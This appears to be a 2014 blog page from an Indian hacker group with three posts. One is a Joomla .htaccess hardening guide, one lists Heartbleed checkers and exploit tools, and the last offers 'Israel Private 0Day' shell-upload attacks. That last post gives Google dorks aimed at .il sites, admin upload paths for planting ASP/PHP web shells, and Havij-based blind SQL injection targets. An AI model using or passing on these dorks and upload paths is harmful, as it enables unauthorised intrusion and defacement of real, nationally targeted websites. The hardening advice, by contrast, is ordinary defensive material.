1ND14N H4X0R5 T34M (IHT) JAI HIND JAI BHARAT

We are :- DeadManINDIA,Null_Port_Govind,Haxor Rahul,EagleShadow,Karate-Katrina,Spy-Hunter,Grey-Noob,Mr.R@66!T.

A big Slute to Our Indian Armies

Freedom is not free Our Soldiers Donates theirs lifes for us

We are Indians and We are Proud to be Indians

India is great.Because their is one place in the world where Peoples Recpect all Religious.

Kali is good OS for Hacking

Peoples Says this OS is best This OS is best but no one OS like Kali Linux .

MOM and DAD

I can't saw God but When i see my MOM and DAD then i think God in there they are My Gods Love You MOM DAD.

Saturday, 12 April 2014

Secure Joomla sites

ecurity of Joomla Website by Htaccess
Htaccess is a configuration file from web servers that run Apache as their server software. It is a very powerful configuration file which can control the server. Htaccess is a hidden file which should be already present in the root directory of your server. If it’s not, then you can create it, but make sure that the right name of the file is “.htaccess” (yes, it starts with a dot). Since we can do so many things with the help of .htaccess, in this section I will discuss the security aspect of an .htaccess file for Joomla.
You can protect the administrative area using different techniques. For example, you can restrict it based on the IP address (in this case you’d need to create an .htaccess file on the administrator directory):

order deny,allow
allow from 116.71.18.189
deny from all

Remember, if your ISP is using the dynamic IP technique, then it is not a good idea to use this technique since your IP address might change at any given time. To prevent use of the directory listing (because an attacker may read important files off the server and a directory listening always help a hacker learn about the security practices of a website), you can write the code below into the .htaccess file which is present in your root:

IndexIgnore *
Options -Indexes

Another best practice is to disable the server signature because it gives an idea about the web server software and the version of the software. To do this, add this line in the .htaccess file to disable the server signature:

ServerSignature Off

Another important step is to secure the .htaccess file itself so that nobody can read it on the browser. To do this, you need to add these lines on the .htaccess file:

<Files .htaccess>
order allow,deny
deny from all
</Files>

Configuration.php is a very important file because it contains information about the database of the website and other relevant information. So you need to secure the configuration.php file by utilizing the .htaccess file:

<FilesMatch "configuration.php">
Order allow,deny
Deny from all
</FilesMatch>

Since there are various security risks associated with the configuration.php file, it is not enough to simply make the adjustments above. For maximum security, you need to move configuration.php outside the public_html. But how to do this? If you simply move the configuration.php file then your website might crash.
How to Move the Configuration.php Outside the public_html Joomla
Below is a tutorial that has been tested on Joomla 1.5 to move the configuration.php file outside the public_html.
In the first step, you need to create a directory home (outside the public_html). Suppose the directory name is irfan:







Download and make a backup of configuration.php.
Delete the current configuration.php from the Joomla folder (from public_html). Remember, when you delete it your website might crash and the error will read:






Go on the folder that has been created in the first step.
Upload the configuration.php in that file.
Go the Joomla file (includes/defines.php) and replace the line:  

define(‘JPATH_CONFIGURATION’,JPATH_ROOT); with: define(‘JPATH_CONFIGURATION’,JPATH_ROOT.DS.’../rootfoldername’);. If 

Joomla is in subdirectory, then replace it with: define(‘JPATH_CONFIGURATION’,JPATH_ROOT.DS.’../../’.DS.’rootfoldername’); (it is a case sensitive so be sure to use proper caps).
 

Remember, the rootfoldername is the name of the folder that we have created in the first step (which is irfan in this case study).
Repeat the same step for: administrator/includes/defines.php.
Now the website is ready and secure.

Conclusion
Since the Internet is not a very safe place, you need to take a personal interest in the security of your website. So if you’re using the Joomla platform, be sure to implement the best security practices available, if you want to remain secure.

HEART BLEED TOOLS (OPEN SSL)

HEART BLEED TOOLS (OPEN SSL)





CHECKER:
ssltest.py: Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford
SSL Server Test :
Metasploit Module: 
Nmap NSE script: Detects whether a server is vulnerable to the OpenSSL Heartbleed: 
Nmap NSE script: Quick'n'Dirty OpenVAS nasl wrapper for ssl_heartbleed based on ssl_cert_expiry.nas 
Heartbleeder: Tests your servers for OpenSSL:
Heartbleed Attack POC and Mass Scanner:
Heartbleed Honeypot Script: 
http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt

Tuesday, 8 April 2014

Israel Private 0Day Shell Upload Exploits ASP|PHP

Hey Guyz ..Today I found some FRESH Private Israel 0Day Exploits . So i thought of sharing with you all....So lets Start....
1). First 0Day Shell Upload ASP | PHP

# Google Dork -|-
'prod1.aspx?pid=' site:il or You can also create your own Dork
# Exploit Upload 1 -|-
/admin/adminbanners.aspx
# Exploit Upload 2 -|- 
/admin/AdminPics.aspx
When you upload your asp or php shell just Check Code Source of the page you will see your url Shell example: /banners/1a62aa_bddf_4e3d_8464_f0f62ac8c7.asp
2). Second 0day Upload

# Dork -|- 
inurl:/index.php?categoryID= site:il
inurl:/index.php?ukey=auth
inurl:/index.php?ukey=feedback
inurl:/index.php?ukey=pricelist
inurl:/index.php?ukey=auxpage_faq
inurl:/shop/index.php?categoryID=
inurl:ukey=product&productID=
# Exploit -|-
/published/common/html/xinha/plugins/ImageManager/manager.php
#‎Exploit‬ -|-
/published/common/html/xinha/plugins/ExtendedFileManager/manager.php

3). Third 0day Upload Blind Sql Injection

 This just Targets with havij or manually and admin page of the script is www.target.co.il/QAdmin
# Dork -|- 

intext:cybercity site:il
inurl:index.php?id= <-- Page 4
intext:medicine site:il
inurl:index.php?id= <-- page 2